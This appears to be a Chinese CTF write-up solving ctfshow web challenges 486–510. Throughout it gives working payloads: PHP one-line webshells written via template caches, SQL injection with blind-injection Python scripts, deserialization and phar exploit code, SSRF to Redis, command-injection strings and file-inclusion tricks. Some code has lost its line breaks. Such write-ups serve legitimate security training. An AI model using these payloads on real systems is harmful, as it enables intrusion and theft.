【Web】CTFSHOW 中期测评刷题记录(1)

web486-toc" style="margin-left:0px;">web486

web487-toc" style="margin-left:0px;">web487

web488%C2%A0-toc" style="margin-left:0px;">web488

web489%C2%A0-toc" style="margin-left:0px;">web489

web490%C2%A0-toc" style="margin-left:0px;">web490

web491-toc" style="margin-left:0px;">web491

web492-toc" style="margin-left:0px;">web492

web493%C2%A0-toc" style="margin-left:0px;">web493

web494%C2%A0-toc" style="margin-left:0px;">web494

web495%C2%A0-toc" style="margin-left:0px;">web495

web496-toc" style="margin-left:0px;">web496

web497-toc" style="margin-left:0px;">web497

web498-toc" style="margin-left:0px;">web498

web499%C2%A0-toc" style="margin-left:0px;">web499

web500%C2%A0-toc" style="margin-left:0px;">web500

web501-toc" style="margin-left:0px;">web501

web502-toc" style="margin-left:0px;">web502

web503%C2%A0-toc" style="margin-left:0px;">web503

web505-toc" style="margin-left:0px;">web505

web506%C2%A0-toc" style="margin-left:0px;">web506

web507%C2%A0-toc" style="margin-left:0px;">web507

web508%C2%A0-toc" style="margin-left:0px;">web508

web509-toc" style="margin-left:0px;">web509

web510%C2%A0-toc" style="margin-left:0px;">web510

web486">web486

扫目录

初始界面尝试文件包含index.php，从报错知道其可以目录穿越读文件

payload:

?action=../flag

右键查看源码拿到flag

web487">web487

?action=../index

存在sql注入

没有waf，直接sqlmap跑出来

sqlmap -u "https://648b315b-136d-427f-b332-417f4865f221.challenge.ctf.show/index.php?action=check&username=1&password=1" --batch -T ctf -C ctf --dumps

web488%C2%A0">web488

?action=../index

关注点在templateUtil的静态方法上，从index.php一开始include的文件入手

?action=../render/render_class

?action=../render/cache_class

整体利用链很清晰

templateUtil::render($action) -> templateUtil::shade($templateContent,$arg)-> cache::create_cache($template,$cache) -> fileUtil::write('cache/'.md5($template).".php",$content)

注意到用./template/error.php中存在{{username}}，可以用其cache来写马

重开个靶机再打入

index.php?action=check&username=<?php eval($_POST[1]);?>&password=12345

注意到{{username}}已经成功被替换为php代码

<?php
echo md5("error");
//cb5e100e5a9a3e7f6d1fd97512215282

再访问./cache/cb5e100e5a9a3e7f6d1fd97512215282.php

命令执行拿flag

web489%C2%A0">web489

和上题一样，在render处打入模板覆盖，用cache写马，但这次只能利用index

配合变量覆盖，让if永真，并让username为一句话木马

/index.php?action=check&username=<?=eval($_POST[cmd]);?>&sql=select%201;

访问./cache/6a992d5529f459a44fee58c733255e86.php，命令执行拿flag

<?php
echo md5("index");
//6a992d5529f459a44fee58c733255e86

web490%C2%A0">web490

还是模板注入./templates/index

/index.php?action=check&username=' union select '<?php eval($_POST[1]);?>' --+&password=1

直接去打会报语法错误

这时候重开下靶机再去读./templates/index.php，发现是给了提示的

我们模板注入的内容是被<?=?>所包裹，因此要改下payload

/index.php?action=check&username=0' union select "`cat /f*`"--+

再访问./cache/6a992d5529f459a44fee58c733255e86.php直接拿到flag

web491">web491

这下不能打模板注入了，但可以时间盲注

import requestsstring = "}qwertyuioplkjhgfdsazxcvbnm0123456789{-"
url = "http://bbfa1c77-aef0-4827-bd1f-6eafb26e85d0.challenge.ctf.show/index.php?action=check&username="
payload = ""
end = "&password=1"def exp():ret = ""for x in range(1, 50):for y in string:payload = "' union select if(substr((select load_file('/flag')),{},1)='{}',sleep(2),1) --+".format(x, y)try:req = requests.get(url + payload + end, timeout=2)except:ret += yprint(ret)if __name__ == '__main__':exp()

web492">web492

关于select_one_array

执行一个 SQL 查询。
返回查询结果的第一条记录。
将这条记录作为数组返回，其中每个数组元素代表一个数据库字段。

模板有一个自动参数绑定，传进去一个$user，获取$user[username]来替换

直接走变量覆盖，绕过查库过程

payload:

?action=check&username[]=1&password=1&user[username]=<?php eval($_POST[1]);?>

访问./cache/6a992d5529f459a44fee58c733255e86.php直接拿到flag

web493%C2%A0">web493

可以在$_COOKIE处打反序列化

?action=../render/db_class

读到可以利用的恶意类

exp:

<?php
class dbLog{public $sql;public $content='<?php eval($_POST[1]);?>';public $log='yjh.php';
}
$a=new dbLog();
echo serialize($a);

在Cookie处打入user参数，成功反序列化

访问./yjh.php，命令执行拿flag

web494%C2%A0">web494

不是很理解这段正则的意义何在(

和上题一样打

flag在数据库里，连蚁剑

拿到flag

web495%C2%A0">web495

和上题一样

拿到flag

web496" style="background-color:transparent;">web496

过滤了or

用变形的万能密码登录

' || 1=1#

?action=../api/admin_edit

存在查库的操作就会存在布尔盲注的空间

import requests
import string
url="http://f7a0f625-bcc6-43e5-b84d-ea086553a12b.challenge.ctf.show"
s=string.ascii_lowercase+string.digits+",{-}"
sess=requests.session()
sess.post(url+"?action=check",data={"username":"'||1#","password":1})
flag=""
for i in range(9,70):print(i)for j in s:data={'nickname':str(i*2)+str(j), #不让nickname重复就行#'user[username]':"'||if(ascii(substr((select  group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))={1},1,0)#".format(i,j)#'user[username]':"'||if(substr((select  group_concat(column_name) from information_schema.columns where table_name='flagyoudontknow76'),{0},1)='{1}',1,0)#".format(i,j)'user[username]':"'||if(substr((select  flagisherebutyouneverknow118 from flagyoudontknow76),{0},1)='{1}',1,0)#".format(i,j)}r=sess.post(url+"/api/admin_edit.php",data=data)if("u529f" in r.text):flag+=jprint(flag)break

web497" style="background-color:transparent;">web497

和上题一样用万能密码登录

点击修改图像，尝试读靶机文件

base64解码得flag

web498" style="background-color:transparent;">web498

万能密码登录

修改头像不能直接读/flag

尝试用gopher探测内网组件，结果靶机直接崩了😡，换dict测出来6379

dict://127.0.0.1:6379

gopherus生成payload，打入

访问./shell.php，命令执行拿flag

web499%C2%A0">web499

SSRF打不通了

与上一题相比多了一个系统配置的功能

?action=../api/admin_settings

读源码看到写文件操作

直接在提交页面写马

访问./config/settings.php，命令执行拿到flag

web500%C2%A0">web500

新功能

?action=../api/admin_db_backup

shell_exec可以进行一个命令拼接，无回显RCE考虑写文件

;cat /f*>/var/www/html/flag.txt

web501">web501

?action=../api/admin_db_backup

多了一段正则

'^zip' 表示匹配以 "zip" 开头的字符串。
'tar' 在任何位置匹配 "tar"。
'sql$' 表示匹配以 "sql" 结尾的字符串。

直接访问./api/admin_db_backup.php

payload:

db_format=;cat /f*>/var/www/html/tar.txt

访问./tar.txt拿到flag

web502" style="background-color:transparent;">web502

这段正则检查字符串 db_format 是否严格等于 "zip"、"tar" 或 "sql"，db_format是没戏唱了

但可以用$pre来拼接

payload:

db_format=zip&pre=1.txt;cat /f*>/var/www/html/tar.txt;

访问./tar.txt拿到flag

web503%C2%A0" style="background-color:transparent;">web503

可以看到shell_exec因为md5的限制，所以不再能利用

多出了file_exists的利用点，可以用上面提到的恶意类打phar反序列化

此外多了一个上传logo的功能，稳了

生成恶意phar包，后缀改png，直接上传

<?php
class dbLog{public $sql;public $content="<?php eval(\$_POST[1]);?>";public $log="yjh.php";
}$c=new dbLog();$phar = new Phar("ctfshow>ctfshow.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");//设置stub，增加gif文件头
$phar->setMetadata($c); //将自定义meta-data存入manifest
$phar->addFromString("a", "a"); //添加要压缩的文件
$phar->stopBuffering();?>

拿到文件上传路径

访问./api/admin_db_backup.php

payload:

pre=phar:///var/www/html/img/3318913d41c2966fc209201c9132b81b&db_format=.png

访问./yjh.php，命令执行拿flag

web505" style="background-color:transparent;">web505

多了一个文件查看功能

读api/admin_file_view.php的源码

直接data伪协议来包含

payload:

debug=1&f=data://text/plain,user<?php system('tac /f*');?>

web506%C2%A0">web506

和上题一样

web507%C2%A0">web507

一样

web508%C2%A0" style="background-color:transparent;">web508

把伪协议给waf掉了

找文件上传点写恶意文件

上传网站logo就可以

文件内容是user拼接命令执行

拿到文件上传路径

payload:

debug=1&f=/var/www/html/img/f418ad41b0e1cf4bbfcc47e67df49f94.png

web509" style="background-color:transparent;">web509

在logo上传处对文件内容有过滤

直接上最短一句话

user<?=`$_GET[1]`;

拿到文件上传路径

debug=1&f=/var/www/html/img/f418ad41b0e1cf4bbfcc47e67df49f94.png

web510%C2%A0">web510

对上传文件内容更为严格，并且因为md5的原因，也不能走配置文件base64解密包含的奇技淫巧

于是走session文件包含，其开头还正好是user，完美利用

修改用户信息，写一句话

成功修改

最终payload:

debug=1&f=/tmp/sess_92ke6l244el6unol1mei073gj2